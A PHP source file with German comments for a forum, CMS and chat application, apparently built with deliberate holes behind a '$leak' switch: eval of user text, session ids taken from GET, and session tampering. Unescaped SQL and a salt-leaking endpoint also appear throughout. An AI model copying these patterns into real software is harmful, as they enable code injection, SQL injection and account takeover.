'/::H(?=[\/?#()\w!&,.: -]+)/' => preg_replace('/(?<=\w)\/(?=\w|$).*$/','',$Self),
'/(~?)(::([pPb]))(?=[\/?#()\w!&,.: -]+)/e' => '!"$1" && array($a = ("$3" == "b") ? "basename" : "preg_replace", $b = ("$3" == "b") ? array() : array("![^/]*$!",""), $b[] = ("$3" == "P") ? $Self : $self) ? call_user_func_array($a,$b) : "$2"',
'/(.?)::(f)\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '%file%' : '').(('\$2' == 'F') ? '$Self' : '$self').'/file?'",
'/(.)~\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '^Profil/)' : '')",
'/(.?)::(w)(?=\/)/ei' => '"$1".(("$1" == "[") ? "%wipe%" : "").(("$2" == "w") ? $wiki : str_replace("de","en",$wiki))',
'/(~?)(?:\$|&#36;)\[(\w+)\]/e' => '("$1") ? "&#x24;[$2]" : ((isset($creolevar["$2"])) ? $creolevar["$2"] : "")'),$creole,array_merge(array(
'/(?<![<>])\r?\n(?!<!-{4}>|$)/e' => '(isset($creolevar["type"]) and $creolevar["type"] != "cms") ? "<br />\r" : " "',
'/(?<!<p>)\s*<!-{4}>\s*(?!<\/p>)/' => ''),(($leak) ? array(
'/(\$|&#36;){2}(.+)\1{2}/e' => '(($x = array(1 => "$2", '."2 => '$2',". /* Debuging preg-replace/eval */ <<<eof
3 => "$2", 4 => '$2',
eof
.
')) ? "" : "") .eval("\\\$x[5] = \'$2\';") .eval("\\\$x[6] = \"$2\";") .eval(\'$x[7] = "$2";\')'."
.eval(\"\\\\\$x[8] = '$2';\") .eval('\$x[9] = \'$2\';') .eval('\$x[10] =\"$2\";')"
.<<<eof
.eval("\\\\\$x[11] = '$2';") .eval("\\\\\$x[12] = \"$2\";") .eval('\$x[13] = "\$2";')
.eval('\$x[14] = \'$2\';')
eof
.
'."<pre>Code-Injection: ".print_r($debug[] = $x,true)."</pre>"') : array())));
break;
}
if(
$img) { // Grafiken für Logo und Icon festlegen
$logo = ($logo) ? $logo : "$self/img?".(count($img)-3);
$icon = ($icon) ? $icon : "$self/img?".(count($img)-2);
}

# Mit Creole ausgesuchte HTML-Zeichen übergeben
if(preg_match_all('/(\w+),([#\w]+)/','et,amp;dq,quot;sz,szlig;nb,nbsp;lt,lt;gt,gt;sq,#39;ds,#36,lf,#10',$val))
foreach(
$val[2] as $key => $var)
$creolevar["_".$val[1][$key]] = "&$var;";
foreach(
explode(',','a,o,u,A,O,U') as $var)
$creolevar["_{$var}e"] = "&{$var}uml;";

# Datenbank bei fehler deaktivieren
if(!$sql or !$conn or !$craw and preg_match('/(bots?|crawler|yandex)(?=\W|$)/i',$_SERVER['HTTP_USER_AGENT']) and $out = "<h1>No Bots allowed!</h1>") {
if(
$sql !== 0)
header('HTTP/1.0 503 Service Unavailable');
if(!
$out)
$out = "<h1>Datenbank kann nicht geöffnet werden!</h1>";
$sql = false;
}
else {

# Variablen mit Datenbank setzen
if(!$mid and $path and preg_match('!/?(Blog|Profil)/([\w.-]+)$!i',$path,$var)) {
$mid = $sql['sq']($conn,"select id from [user] where username like '$var[2]'");
if(
$request == 'Blog')
$getopt[] = "id=$mid";
}
if(!
$lone = $sql['sq']($conn,"select count(*) from [user]")) {
$info[3] = "**Der [[^Anmelden|erste Benutzer]] des Forums bekommt automatisch Admin-Rechte!**\r\n";
$user = true;
if(!
$request and !$query or $request == 'Mitglieder')
$request = 'Anmelden';
}
elseif(
$lone > 1)
$lone = false;
$getopt = (isset($getopt)) ? implode("&amp;",$getopt) : ''; // Suchoptionen als url festlegen

# Sitemap ausgeben
if($craw and $request == 'sitemap.xml' and $array = $sql['aq']($conn,"
select name, -- CMS
strftime('%Y-%m-%d',change) as date
from [cms]
where status/8%2 = 1 and status/2%4 = 0 and content like '%\n%'
union
select 'Profil/'||username as name, -- User-Profil
strftime('%Y-%m-%d',change) as date
from [user]
where status is not null and profil is not null
union
select 'Blog/'||u.username||'?q='||f.id as name, -- User-Blog
strftime('%Y-%m-%d',f.change) as date
from [forum] as f
left join [user] as u on u.id = f.userid
where f.userid = f.mailid and f.status%2 = 0 and u.status is not null
order by date desc"
,SQLITE_ASSOC)) {
foreach(
$array as $key => $var)
$array[$key] = "<url><loc>$Self/$var[name]</loc><lastmod>$var[date]</lastmod></url>";
header('Content-Type: text/xml');
die(
"<?xml version='1.0' encoding='UTF-8'?>\n"
."<urlset xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>\n".implode("\n",$array)."\n</urlset>");
}

# Mit Ajax Daten für ein Benutzer zurückgeben
if(isset($_GET['salt']) and preg_match('/[@\w.-]+/',$_GET['salt'],$var)) // Salt
die((preg_match('/^([\w.-]+),salt:(\w+)-hash:\w+$/',$sql['sq']($conn,"select username||','||password from [user] where username like '$var[0]' or mail like '$var[0]'"),$val)) ? "$val[1]:$val[2]" : false);
elseif(isset(
$_GET['ask']) and preg_match('/([@\w.-]+)(?::([\w@.-]+))?/',$_GET['ask'],$var)) // ask
die((preg_match('/^(\d+)-(?:(.+?):)?/',$sql['sq']($conn,"select passhelp from [user] where username like '$var[1]'".(($leak) ? "" : " and mail like '".((isset($var[2])) ? $var[2] : '')."'")),$val)) ? (($val[1]) ? "$val[1]-{$pass[$val[1]]}" : "$val[1]-$val[2]") : false);

# Alternativer Hash-Login
if(count($_POST) == 0 and (isset($_GET['id']) and preg_match('/^(\d+)\.(\w+)$/',$_GET['id'],$var)
or isset(
$_SERVER['HTTP_REFERER']) and preg_match('/id=(\d+)\.(\w+)/',$_SERVER['HTTP_REFERER'],$var))
and
$row = $sql['sq']($conn,"select username||':'||password from [user] where status is not null and id=$var[1]") and $hash[0]($row) == $var[2]) {
$status = 1;
$uid = $var[1];
$row = $var[0];
}

# Feeds ausgeben
if($request == 'Atom' and ($inet or !$inet and $uid)) {
if(
$id and $uid and $row)
$uid = $id;
$array = $sql['aq']($conn,"
select f.id as id,
f.id as name,
f.[create] as 'create',
f.[create] as change,
path,
ifnull(title,'Ohne Titel') as title,
mailid,
message,
ifnull(f.status%2,'-1') as right,
ifnull(u.username,'Unbekannt') as author,
ifnull(m.username,'Unbekannt') as tomail
from [forum] as f
left join user as u on u.id = f.userid
left join user as m on m.id = f.mailid
where f.status is not null and "
.(($mid) ? "f.mailid = f.userid and f.userid = $mid".(($uid) ? "" : " and f.status%2 = 0")
: ((
$uid) ? "(f.mailid is null or f.mailid = $id or f.mailid is not null and f.userid = $id)"
.((isset($_GET['latest']) and $var = $sql['sq']($conn,"select change from [user] where id=$id"))
?
" and (f.[create] > datetime('$var') or f.mailid = $id and f.status/2%2 = 0)" : "")
:
"f.mailid is null and f.status%2 = 0")."
union all
select id,
name,
[create] as 'create',
change,
null as path,
ifnull(description,'Ohne Titel') as title,
null as mailid,
content as message,
ifnull(status/2%4,'-1') as right,
(select username from user where status/2%2 order by id limit 1) as author,
'Unbekannt' as tomail
from [cms]
where status/8%2 = 1 and status/2%4 < "
.(($uid) ? 3 : 1))."
order by 4 desc
limit "
.max(min(((isset($_GET['max']) and preg_match('/\d+/',$_GET['max'],$var)) ? $var[0] : $paging[1]),$paging[2]),$paging[0]),SQLITE_ASSOC);
foreach(
$array as $key => $var) {
$creolevar = array_merge($creolevar,array('type' => 'feed', 'id' => $var['id'], 'name' => $var['name'], 'title' => $var['title'], 'from' => $var['author'], 'right' => $var['right'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change'])));
$array[$key] = "<entry>
<title type=\"html\">"
.strtr($var['title'],$html)."</title>
<content type=\"html\"><![CDATA["
.((preg_match('!/(\d+)/$!',$var['path'],$val)) ? "<table align='right'><tr><td>(<a href='$Self?q=$val[1]' title='Bezugsnachricht'>^</a>)</td></tr></table>" : '')
.
preg_replace(array_keys($creole),str_replace($self,$Self,array_values($creole)),strtr(preg_replace('/::f\/[\w()!,.-]+/',"\$0&id=$row",$var['message']),array_slice($html,1)))."]]></content>
<link href=\"
$Self".(($var['id'] != $var['name']) ? "/$var[name]" : (($var['mailid']) ? "/".(($var['author'] == $var['tomail']) ? "Blog" : "Mail").(($uid) ? "?id=$row&amp;" : "?") : (($uid and $row) ? "?id=$row&amp;" : "?"))."q=$var[id]")."\" />
<id>
$var[id].".strtotime($var['create'])."</id>
<updated>"
.date("Y-m-d\TH:i:s",strtotime($var['change'])).preg_replace('/([+-][\d]{2})([\d]{2})/','$1:$2',date("O",strtotime($var['change'])))."</updated>
<author><name>"
.strtr($var['author'],$html)."</name><url>$Self/Profil/".strtr($var['author'],$html)."</url></author>".(($var['mailid'] and $var['author'] != $var['tomail']) ? "
<contributor><name>"
.strtr($var['tomail'],$html)."</name><url>$Self/Profil/".strtr($var['tomail'],$html)."</url></contributor>" : "")."\n</entry>\n";
}
$cleanup = array_merge($creoleph['toutf'],array('/[\x00-\x1f]+/' => ''));
header('content-type: text/xml; charset=UTF-8');
die(
"<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'>
<title>
$title</title>
<link href='
$Self' />
<updated>"
.preg_replace('/^.+?<updated>([^<]+).*$/s','$1',reset($array))."</updated>
<generator>PHP/"
.phpversion()."</generator>
<logo>
$logo</logo>\n".preg_replace(array_keys($cleanup),array_values($cleanup),implode('',$array))."\n</feed>");
}

# Session starten
if($leak and isset($_GET[session_name()]))
session_id($_GET[session_name()]);
@
session_start();
if(isset(
$_SESSION['uid']) and $_SESSION['uid']) {
$uid = $_SESSION['uid'];
$status = $sql['sq']($conn,"select status from [user] where id=$uid");
}
else
$_SESSION['src'] = (!isset($_COOKIE['login']) and isset($_SESSION['src'])) ? $_SESSION['src'] + 1 : 0;

# Sessiondaten manipolieren
if($leak and $request == 'set' and preg_match(substr($dpsk,0,-2).'=([\w\s:-]*)$/',urldecode($query),$var))
if(
$var[2])
$_SESSION[$var[1]] = $var[2];
else
unset(
$_SESSION[$var[1]]);

# Cookie-Login
if(isset($_COOKIE['login']) and preg_match('/^(\d+)\.(\w+)$/',$_COOKIE['login'],$var) and $val = $sql['aq']($conn,"
select username||':'||password as hash,status,change from [user] where status is not null and id =
$var[1]") and $hash[0]($val[0]['hash']) == $var[2]) {
$row = array('set' => "status=(status/2%8*2+1),", 'where' => "(status%2 = 0 or datetime(change,'+$eos minutes') < datetime('now','localtime')) and ");
$uid = $var[1];
if(!isset(
$_SESSION['uid'])) {
$_SESSION['uid'] = $uid;
$_SESSION['lua'] = $val[0]['change'];
setcookie('login',"$uid.".$hash[0]($val[0]['hash']),time()+$ctl,$self);
}
$status = floor($val[0]['status']/2)*2+1;
}

# Loginbestätigung für Atom-Feeds & Cookie-Login
if($rw and $uid and $row)
$sql['e']($conn,"
update [user] set "
.((is_array($row) and isset($row['set'])) ? $row['set'] : '')."
logins=logins+1,
requests=requests+1,
change=datetime('now','localtime'),
ip='
$addr',
useragent='"
.$sql['es']($_SERVER['HTTP_USER_AGENT'])."'
where "
.((is_array($row) and isset($row['where'])) ? $row['where'] : '')."status is not null and id=$uid");

# Datei-Download
if($request == 'file'
and ( preg_match('/^(\d+)(?:-([\w!,.-]+))?/',$query,$var)
or (
$var[1] = $mid) and $var[2] = $query))
if(
$file = $sql['aq']($conn,"
select c.id as id,
a.name as name,
ifnull(ifnull(a.type,b.type),'application/octet-stream') as type,
ifnull(a.size,b.size) as size,
ifnull(a.data,b.data) as data,
strftime('%s',ifnull(a.[create],b.[create])) as time
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
left join [file] as c on a.id = c.id"
.(($status/2%2) ? "" : " and (c.status%2 = 1 or c.status%2 = 0 and '$uid' != '')")."
where "
.((!@$var[2]) ? (($status/2%2) ? "" : "a.user = ".(int)$uid." and ")."a.id = ".(int)$var[1]
:
"a.user = ".@(int)$var[1]." and a.name like '".@$sql['es']($var[2])."'")."
order by a.id desc, a.name
limit 1"
,SQLITE_ASSOC))
if(
$file[0]['id']) {
if(
$cache) {
$time = $file[0]['time'];
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if((
$val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset(
$val["If-None-Match"]) and isset($val["If-Modified-Since"])
and
$val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and
$_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
header("Content-Type: ".$file[0]['type']);
header("Content-Length: ".abs($file[0]['size']));
header('Content-Disposition: filename="'.$file[0]['name'].'"');
die(((
$var = base64_decode($file[0]['data']) and $file[0]['size'] > 0) ? $var : $gz['inflate']($var)));
}
else {
header('HTTP/1.0 401 Unauthorized');
die(
"<h1>Datei benötigt Benutzeranmeldung!</h1>");
}
else {
header('HTTP/1.0 404 File Not Found');
die(
"<h1>Datei nicht gefunden!</h1>");
}

# Forum bei Externen-Adressen ohne Ameldung deaktivieren
if(!$inet and !$uid and !$local)
$request = 'Impressum';

# Statischen/Dynamischen Content bereitstellen/ausgeben
if($content = (isset($content[$request])) ? $content = $content[$request] : (($request and !isset($_REQUEST['nocms']) or !count($_GET) and !count($_POST)) ? $sql['aq']($conn,"
select ifnull(r.content,ifnull(c.content,'')) as '.content',
strftime('%s',ifnull(r.change,c.change)) as change,
strftime('%s',ifnull(r.[create],c.[create])) as 'create',
ifnull(r.id,c.id) as id,
ifnull(r.name,c.name) as name,
ifnull(r.description,c.description) as title,
ifnull(ifnull(r.status,c.status)/2%4,'-1') as right,
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name like '"
.preg_replace('/^(Abmelden)$/','',$request)."' and c.status/2%4 <= ".($status/2%2 + $status%2*2),SQLITE_ASSOC) : false)) {
if(
is_array($content) and $var = reset($content)) {
header('Last-Modified: '.date('r',$var['change']));
$head['cms'] = "<meta name='description' content='$var[title]' />";
if(
$var['right'] == 2 or $status/2%2)
$uedit = "CMS?id=$var[id]";
$creolevar = array_merge($creolevar,$var);
$content = $var['.content'];
}
if(
preg_match('!^(https?://|/|\.|#|::(?=l\/))[^<\s\'>]+$!',$content,$var)) { // Linkweiterleitung
if($var[1] == '::')
$content = strtr($content,array('::l' => $self, '::L' => $Self));
header("Location: $content");
die(
"<html><head><meta http-equiv='refresh' content='0; URL=$content' /><title>$content</title></head>
<frameset><frame src='
$content' /><noframes><body><script type='text/javascript'><!--
top.location.href='
$content';//--></script><noscript><a href='$content'>$content</a></noscript></body></noframes></frameset></html>");
}
if(
$content)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $content : strtr($content,array_slice($html,1))))."</div>";
$request .= " ";
}

# Datenbank beschreibbar
if($rw) {

# Pre-Chatline: Abmelden wenn Interaktionslose Zeit abgelaufen & Aufräumen
$sql['e']($conn,"
update [user] set status = (status/2%8*2), -- Autologoff
chat = null
where status = (status/2%8*2+1)
and datetime(change,'+
$eos minutes') < datetime('now','localtime')
and status is not null;
update user set [chat] = null -- Aufraeumen
where id = ( select a.id
from [user] as a
left join [user] as b on a.chat = b.id"
.(($leak) ? "" : " and b.status > 0")." -- Chatpartner noch Online (Moeglicher Fehler: > 0)
where a.status is not null and a.chat > 0 and b.chat is null -- Chatter nicht gesperrt und noch Online (Moeglicher Fehler: > 0)
limit 1); -- und Chatpartner nicht im Chat
delete from [chat]
where chat = (select a.chat -- chatkanal
from [chat] as a
left join [user] as b on a.chat = b.chat -- Teilnehmer des Chatkanals
or a.chat <= 0 and a.user = b.id and status%2 = 1 -- Teilnehmer ist online
or abs(a.chat) = b.id and a.chat != b.id and (b.chat is null and status%2 = 1 or b.chat = b.id)
where b.id is null -- Keins der Bedingungen trifft zu!
group by a.chat
limit 1)"
);
# Chatline
if($request == 'Chat' and !$lone and $uid and $status%2) {
$wait = false;
foreach(
$array = array( // Browser-Cache komplett abschalten
'Cache-Control' => 'no-cache, no-store, must-revalidate',
'Pragma' => 'no-cache',
'Expires' => '0') as $key => $var) {
header("$key: $var");
$head[] = "<meta http-equiv=\"$key\" content=\"$var\" />";
}
if(isset(
$_REQUEST['chat']) and preg_match('/^(auth|call|edit|news|quit|send|sign|user|html)(?::(.*))?$/',$_REQUEST['chat'],$chat)) {
#html
if($chat[1] == 'html') { // Chatline ohne JavaScript
$wait = (isset($_REQUEST['wait']) and preg_match('/^\d{1,3}$/',$_REQUEST['wait'],$var) and $var[0] >= 30) ? $var[0] : 30;
if(
$status/8%2) // Verschlüsselung abschalten
$sql['e']($conn,"update user set status = status%8 where id = $uid");
if(isset(
$_REQUEST['edit']) and preg_match('/^[01]$/',$_REQUEST['edit'],$var) and $var[0] != $status/4%2) // edit
$chat = array(0,'edit',$var[0]);
elseif(isset(
$_REQUEST['call']) and isset($_REQUEST['user']) and isset($_REQUEST['line'])
and
preg_match('/^\d+,.*$/',"$_REQUEST[user],$_REQUEST[line]",$var)) // call
$chat = array(0,'call',$var[0]);
elseif(isset(
$_REQUEST['quit'])) // quit
$chat[1] = 'quit';
elseif((isset(
$_REQUEST['send']) or isset($_REQUEST['doit'])) and isset($_REQUEST['line']) and $_REQUEST['line'] != '') // send
$chat = array(0,'send',$_REQUEST['line']);
elseif(
$var = $sql['aq']($conn,"select user,text from [chat] where chat = -$uid limit 1")) // auth
$chat = array(0,'auth',(($status/4%2 and !preg_match('/^key:\w+:/',$var[0]['text'])) ? '' : '-').$var[0]['user']);
}
else
$out = 0;
#user
if($chat[1] == 'user') // Userstatus übermitteln
$out = implode(",",$sql['sq']($conn, /* id:status,chat,users; ... */ "
select u.id||','||ifnull(c.status,u.status)
from [user] as u
left join [user] as c on u.chat = c.chat
where u.status is not null
group by u.id"
));
#edit
elseif($chat[1] == 'edit' and @preg_match('/^[013457]$/',$chat[2]) and $sql['e']($conn, /* Eigenen Chatstatus bearbeiten */"
update [user] set
status = status%4+((
$chat[2]%2 + $chat[2]/4%2*2)*4)
where id =
$uid"))
$out = $sql['c']($conn);
#auth
elseif($chat[1] == 'auth' and preg_match('/^(-?\d+)(?:,(\w+),([=\w\/+]+))?$/',$chat[2],$var) and $sql['e']($conn, /* Chat Erlauben */"
update [user] set
chat = "
.(($var[1] < 0) ? 'null' : 'chat*-1')."
where abs(chat) =
$uid and id = abs($var[1]);".(($var[1] < 0) ? "
delete from [chat]
where chat = -
$uid and user = abs($var[1])" : "
update [user] set
chat = id
where chat is null and id =
$uid;
update [chat] set
chat = abs(chat)
where chat = -
$uid and user = abs($var[1])".((count($var) > 3) ? ";
insert into [chat] (chat,user,time,text) values (
$uid,$var[1],datetime('now','localtime'),'key:$var[2]/$var[3]:')" : ""))))
$out = $sql['c']($conn);

#send/sign
elseif(($chat[1] == 'send' or $chat[1] == 'sign' and $status/2%2) and @preg_match('/^.+$/',$chat[2]) and $sql['e']($conn, /* Nachricht Senden */ "
insert into [chat] (chat,user,time,text) values ("
.(($chat[1] == 'send') ? $sql['sq']($conn,"select chat from [user] where id = $uid") : 0).",$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',((preg_match('!^[\w+/]+=*$!',$chat[2]) or !$leak) ? strtr($chat[2],$html) : @preg_replace(array_keys($creole),array_values($creole),strtr($chat[2],$html)))))."')"))
$out = $sql['c']($conn);
#call
elseif($chat[1] == 'call' and preg_match('/^(\d+),?(.*)$/',$chat[2],$val) and ($var = $sql['sq']($conn,/* Chat beginnen */"
select ifnull(b.chat,a.id)
from user as a
left join [user] as b on b.chat = a.chat
left join ( select d.id,
count(d.chat) as chats
from user as d
left join user as e on d.chat = e.chat
group by d.id) as c on c.id = a.id
where (b.status%2 and b.status/4%2
or b.id is null and a.status%2 and a.status/4%2
or a.id = b.id and c.chats = 1) and a.id =
$val[1]
limit 1"
)) !== false) // Botnet Workaround für Antworten
$out = $sql['e']($conn,"
update [user] set
chat = '-"
.intval($var)."'
where chat is null and id =
$uid;
insert into [chat] (chat,user,time,text) values ('-"
.intval($var)."',$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',$val[2]))."');");
#quit
elseif($chat[1] == 'quit' and $val = reset(($sql['aq']($conn, /* Chat beenden */ "
select a.chat as chat,count(b.id) as users
from [user] as a
left join [user] as b on a.chat = b.chat
where a.id =
$uid
group by a.id"
)))) {
$sql['e']($conn, /* Offene Chatanfragen löschen */ "
delete from [chat]
where user =
$uid and chat < 0");
if((
$val['chat'] and $val['chat'] != $uid or $val['users'] and $val['users'] < 3)) // Nur den Client oder beide beim Privaten Chat
$sql['e']($conn,"
update [user] set
chat = null
where chat =
$val[chat]".(($val['users'] < 3) ? "" : " and id = $uid"));
elseif(
$val['chat'] == $uid and $var = $sql['sq']($conn,"select id from [user] where chat = $val[chat] and id != $uid limit 1")) // Master ersetzen
$sql['e']($conn,"
update [user] set
chat = null
where id =
$uid;
update [user]
set chat =
$var
where chat =
$val[chat];
update [chat] set
chat =
$var
where chat =
$uid");
$out = 1;
}
#news
elseif($chat[1] == 'news' and @preg_match('/\d*/',$chat[2])) { // Aktuelle Chat-Neuigkeiten abfragen
$var = $sql['aq']($conn,"
select count(a.id), -- 0 Anzahl User
count(nullif(a.status%2,0)), -- 1 Anzahl der Logins
count(nullif(a.status/4%2,0)), -- 2 Anzahl der Chatter
count(nullif(a.status/8%2,0)), -- 3 Anzahl der Chatter
count(a.chat), -- 4 Anzahl der Chats
ifnull(sum(a.chat),0), -- 5 Hash der Chats
count(b.id), -- 6 Anzahl der Masters
ifnull((select chat from [user] where id =
$uid),'-'), -- 7 Eigene Chat-ID
ifnull((select id from user where chat !=
$uid and abs(chat)=$uid limit 1),'-') -- 8 Erste ID von Chatanfrage(n)
from [user] as a
left join [user] as b on a.id = b.id and b.id = b.chat
where a.status is not null"
,SQLITE_NUM);
if(
$val = intval($var[0][8])) ## 9 Erster Text von Chatanfrage(n)
$var[0][] = preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$sql['sq']($conn,"select text from chat where user = $val and chat = -$uid limit 1"));
$val = (isset($chat[2])) ? intval($chat[2]) : 0;
$wrt = intval($var[0][7]); // Chat-ID
$out = implode(',',$var[0]).";";
$var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = $wrt or chat = '0'"); // 1 Max Chat-Messages
$out .= "$var;";
if(isset(
$chat[2]) and $var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where ("
.(($wrt) ? "chat = $wrt or " : "")."chat = '0') and id > $val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id"
) and count($array)) {
$out .= count($array);
foreach(
$array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
else
$out .= "0;";
}
#end
if(preg_match('/call|edit|quit|send|sign/',$chat[1])) // User-Lifetime zurücksetzen
$sql['e']($conn,"
update [user] set
change = datetime('now','localtime'),
requests = requests+1
where id =
$uid");
if(
$wait) { // HTML-Chat ausgeben (NoScript)
$out = '';
if(
$chat = $sql['sq']($conn,"select chat from [user] where id = $uid")) {
$array = $sql['aq']($conn,"
select ifnull(u.username,'Unbekannt') as user,strftime('%d.%m.%Y %H:%M:%S',c.time) as time,c.text as text
from [chat] as c
left join [user] as u on u.id = c.user
where c.chat =
$chat
order by c.time desc
limit 10"
);
foreach(
$array as $key => $var)
$array[$key] = "<p><fieldset class='cr'><legend><b>$var[user]</b> <small>($var[time])</small></legend><div>".strtr($var['text'],array_slice($html,1))."</div></fieldset></p>";
$out = implode("\n",$array);
}
@
header('Content-Type: text/html; charset=utf-8');
$out = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">" /* 4.01 Transitional */ ."
<html lang=\"de\"><head><title>NoScript Chatline</title>
<meta http-equiv='refresh' content='
$wait; URL=$self/Chat?chat=html:".time()."&amp;wait=$wait' />
<meta http-equiv='content-type' content='text/html; charset=utf-8' />\n</head><body>"
.strtr($out,$uml)
.(((
$leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "<hr />".date('d.m.Y H:i:s')
.
"<pre>".print_r($_REQUEST,true).((isset($debug)) ? print_r($debug,true) : '')."</pre>" : "")."</body></html>";
}
else
header('Content-Type: text/plain');
die(
"$out"); // Ergebnis ausgeben
}
if(
is_array($jschat) and is_array($jschat['crypt'])) { // Verschlüsselten Chat vorbereiten
foreach($jschat['crypt'] as $key => $var)
$head["chat.$key"] = "<script type='text/javascript' language='javascript' src='$var'></script>";
$a = "['$jschat[prime]','".(($jschat['main']) ? $jschat['main'] : substr(strrev(str_rot13($jschat['prime'])),1))."',$jschat[base]]";
}
else
$a = 'false';
$rows = $sql['aq']($conn, /* Chat-GUI Erstellen */ "
select id,username
from [user]
where status is not null
order by username"
);
foreach(
$rows as $key => $var)
$rows[$key] = "<option value='$var[id]'>$var[username]</option>";
$val = array(0 => 'Ablehnen', 1 => 'Erlauben', 3 => 'Zeigen');
foreach(
$val as $key => $var)
$val[$key] = "<span id='sr$key'".(($key == 3) ? " style='display:none'" : "")."><input type='radio' name='edit' id='r$key' onclick='cl(2,$key)' value='$key' ".(($status/4%2 == $key) ? "checked " : "")."/><label for='r$key'>$var</label></span>";
$var = "<form name='chat' method='post' action='$self/Chat' target='nschatline' onsubmit='cl(6,0);return false'><fieldset><legend><b>".((isset($_GET['nojs'])) ? "Chatline" : "<a href='$self/Chat?nojs' title='Chat ohne JavaScript und ohne Verschlüsselung'>Chatline</a>")."</b></legend>
<noscript><iframe src='
$self/Chat?chat=html' style='width:100%;height:50%' name='nschatline'></iframe></noscript>
<input type='hidden' name='chat' value='html' /><input type='hidden' name='copy' value='' /><input type='submit' name='doit' style='display:none' />
<div id='view' style='width:100%;height:400;overflow-y:auto;display:none'></div>
<table width='100%'><tr><td><input type='text' name='line' value='' size='80' style='width:100%' /></td>
<td width='1%'><input type='submit' name='send' value='Senden' /></td></tr></table>
<table width='100%'><tr><td>Chat mit&nbsp;<select size='1' name='user' onchange='cl(3,this.value)'><option value='-'>Bitte wählen...</option>
<option value='0' style='display:none' disabled>Alle Benutzer</option>"
.implode("",$rows)."</select>&nbsp;
<input type='submit' name='call' value='Verbinden' onclick='cl(4,B.user.value+\",\"+line.value);return false' />
<input type='submit' name='quit' value='Trennen' onclick='cl(5,0);return false' /></td>
<td align='center'><span onclick='cl(7,0)'>Refresh:&nbsp;</span> <select size='1' name='wait'>"
.preg_replace('/(\d+)(h?)(s?)/e','"<option value=\'$1\'".(("$2") ? "style=\'display:none\' disabled" : "")
.(("$3") ? "selected" : "").">$1</option>"'
,'3h 5h 10h 15h 20 30s 45 60 90 120')."</select>&nbsp;Sek.</td>
<td align='right'><span id='cryptchat' style='display:none'><label for='crypt'>Verschlüsselung:</label>
<input type='checkbox' id='crypt' name='crypt' value='1' onclick='cl(9,this.checked)' "
.(($status/8%2) ? "checked " : "")."/></span>&nbsp;Chatanfragen: "
.implode("\n",$val)."</td></tr></table></fieldset>
<script type='text/javascript'><!--\n"
.preg_replace($js,'',"
function cl(x,y) { // Omni Chat-Function (x -> Mode / y -> Parameter)
switch(x) {
case 0: // 0:Exclusic-Oder für IE6
return (y[0] || y[1]) && !(y[0] && y[1]);
case 1: // 1:Per Ajax Chat-Kommandos abschicken
if(A) {
A.open('POST',location.pathname,false);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.send('chat=' + encodeURIComponent(y)); // Absenden"
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
jsdebug(y + '\\x20->\\x20' + A.responseText); // Chat-Requests Debugen"
: "")."
return A.responseText
}
return false;
case 2: // 2:[edit] Chatstatus ändern
cl(1,'edit:' + (y + B.crypt.checked * 4));
break;
case 3: // 3:User auswählen
if(parseInt(y,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';"
.(($status/2%2) ? "
if(y == 0)
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
else {
B.send.disabled = true,
B.doit.disabled = true;
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;
}"
: "
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;"
)."
break;
case 4: // 4:[call] Chat mit User beginnen
if(y && cl(1,'call:' + ((F && B.crypt.checked && (z = window.name.match(/^key:\w+,(\w+),[\w-]+$/))) ? y.replace(/,/,',key:' + z[1] + ':') : y)) != 0)
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.line.disabled = true,
B.quit.disabled = false,
B.quit.style.display = 'inline',
B.crypt.disabled = true;
cl(8,0);
break;
case 5: // 5:[quit] Chat beenden
cl(1,'quit');
B.call.disabled = false,
B.call.style.display = 'inline',
B.user.disabled = false,
B.quit.disabled = true,
B.quit.style.display = 'none',
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
cl(8,0);
break;
case 6: // 6:[sign|send] Nachricht Senden
if(cl(1,"
.(($status/2%2) ? "((B.user.value == 0) ? 'sign' : 'send')" : "'send'")." + ':' + ((F && (z = window.name.match(/(\w+)$/)))
? CryptoJS.MD5(z[1] + ',' + B.line.value) + '/' + CryptoJS.AES.encrypt(B.line.value,z[1]).toString().replace(/([^=])$/,'$1=')
